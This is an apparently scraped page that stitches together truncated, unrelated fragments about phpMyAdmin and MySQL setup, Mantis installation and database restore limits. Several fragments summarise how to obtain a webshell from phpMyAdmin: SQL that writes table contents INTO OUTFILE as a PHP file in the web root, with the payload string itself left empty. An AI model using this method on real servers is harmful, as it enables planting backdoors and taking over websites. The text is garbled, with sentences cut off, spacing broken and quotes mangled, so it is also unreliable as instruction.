In the previous phpMyAdmin tutorial I introduced a number of phpmyadmin configuration knowledge, in the phpmyadmin3.4 version of the graphical phpMyAdmin configuration features, mainly from the phpMyAdmin server configuration, A graphical interface
phpMyAdmin as a tool to manage MySQL database, more and more by the development of PHP website builders Welcome, Before that I introduced two phpMyAdmin introductory tutorials: The phpmyadmin3 installation configuration diagram tutorial and the
Convenient for everyone to reprint and offline reading, this tutorial HTML source code, UBB source, pdf version, flash version to provide download.Download Address: Http://code.google.com/p/wpmi/downloads/list
Operating system:
Because of the recent need to decorate mantis for bug tracking, the process is documented here.Because the PHP Apache environment is self-bringing on Mac OS, there is no need to install another package, simply configure it.First open the Terminal
First, the preparatory work:
1. If MySQL root account is empty, you need to set the root passwordCentOS under the default installed MySQL server, inside the root account default password is empty, first set a password for root#mysqladmin-u root
Obtain the webshell method summary in the phpmyadmin backgroundMethod 1:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----
Use new gains install Ubuntu source phpmyadmin version is 2.11.3phpmyadmin official website has the latest version of the http://www.phpmyadmin.net installed, access http: // localhost/phpmyadmin login, use root Login Without Password, error # login
phpMyAdmin is a frequently used MySQL management tool, backup and restore is an important function of phpMyAdmin, in the restoration of the database often encountered such a situation: phpMyAdmin restore the database when the maximum upload limit: 2,
Site.com/phpmyadminSite.com/sqlD:\wamp\wwwAccount number and password.Root passwordFirst KindCREATE TABLE ' mysql '. ' Darkmoon ' (' Darkmoon1 ' TEXT not NULL);INSERT into ' MySQL '. ' Darkmoon ' (' Darkmoon1 ') VALUES (' ');SELECT ' Darkmoon1 '
Method One:CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);INSERT into ' MySQL ', ' xiaoma ' (' xiaoma1 ') VALUES (' ');SELECT xiaomafrom study into OUTFILE ' e:/wamp/www/7.php ';----above at the same time, in the database: MySQL
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.